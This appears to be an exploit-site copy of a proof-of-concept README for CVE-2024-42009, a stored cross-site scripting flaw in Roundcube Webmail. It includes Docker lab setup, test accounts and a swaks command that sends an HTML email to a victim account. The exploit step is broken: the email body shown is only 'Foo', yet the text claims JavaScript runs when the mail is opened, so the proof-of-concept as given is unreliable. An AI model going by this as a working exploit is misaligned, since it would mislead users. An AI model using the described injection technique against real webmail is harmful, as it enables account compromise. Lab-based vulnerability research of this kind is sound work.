Exploit for Cross-site Scripting in Roundcube Webmail CVE-2024-42009

## https://sploitus.com/exploit?id=AE873A7A-B3DF-5925-A2E3-2F8666114170
# CVE-2024-42009 – Roundcube Stored XSS (Docker PoC)

## 📌 Overview

This repository demonstrates a working Proof-of-Concept (PoC) for **CVE-2024-42009**, a stored Cross-Site Scripting (XSS) vulnerability in Roundcube Webmail.

The vulnerability is caused by improper HTML sanitization followed by unsafe attribute reprocessing, allowing attackers to inject malicious event handlers via crafted HTML emails.

---

## ⚠️ Affected Versions

* Roundcube ≤ 1.5.7
* Roundcube ≤ 1.6.7

---

## 🧠 Vulnerability Summary

Roundcube sanitizes incoming HTML emails but later re-processes certain attributes (e.g., `bgcolor`, malformed attributes), leading to:

* Attribute boundary confusion
* Injection of new attributes
* Reintroduction of dangerous event handlers (e.g., `onanimationstart`)

This allows execution of arbitrary JavaScript when a victim opens a malicious email.

---

## 🐳 Environment Setup (Docker)

### 1. Clone the repository

```bash
git clone https://github.com/yourusername/CVE-2024-42009-PoC.git
cd CVE-2024-42009-PoC
```

---

### 2. Start the vulnerable lab

```bash
docker compose up -d
```

⏳ Wait ~10–15 seconds for the mail server to initialize.

---

### 3. Create test users

```bash
docker exec mailserver setup email add attacker@lab.local 'attacker123'
docker exec mailserver setup email add victim@lab.local 'victim123'
```

---

### 4. Access Roundcube

```
http://localhost:8080
```

**Credentials:**

* [victim@lab.local](mailto:victim@lab.local) / victim123
* [attacker@lab.local](mailto:attacker@lab.local) / attacker123

---

## 💣 Exploitation (Universal – No Installation Required)

Send the malicious email using a **swaks** tool:

```bash
swaks --to victim@lab.local \
      --from attacker@lab.local \
      --server localhost:2525 \
      --header "Content-Type: text/html; charset=utf-8" \
      --header "Subject: CVE-2024-42009 PoC" \
      --body 'Foo'
```

---

## 🎯 PoC

1. Log into Roundcube Victim Account
2. Open the email inbox
3. JavaScript executes (alert pops)

---

## 🛡️ Mitigation

Upgrade to patched versions:

* Roundcube ≥ 1.6.8
* Roundcube ≥ 1.5.8

---

## 📚 References

* NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-42009
* Roundcube Security Advisory

---

## ⚖️ Disclaimer

This project is for educational and authorized security research purposes only.
Do not use against systems without proper permission.

---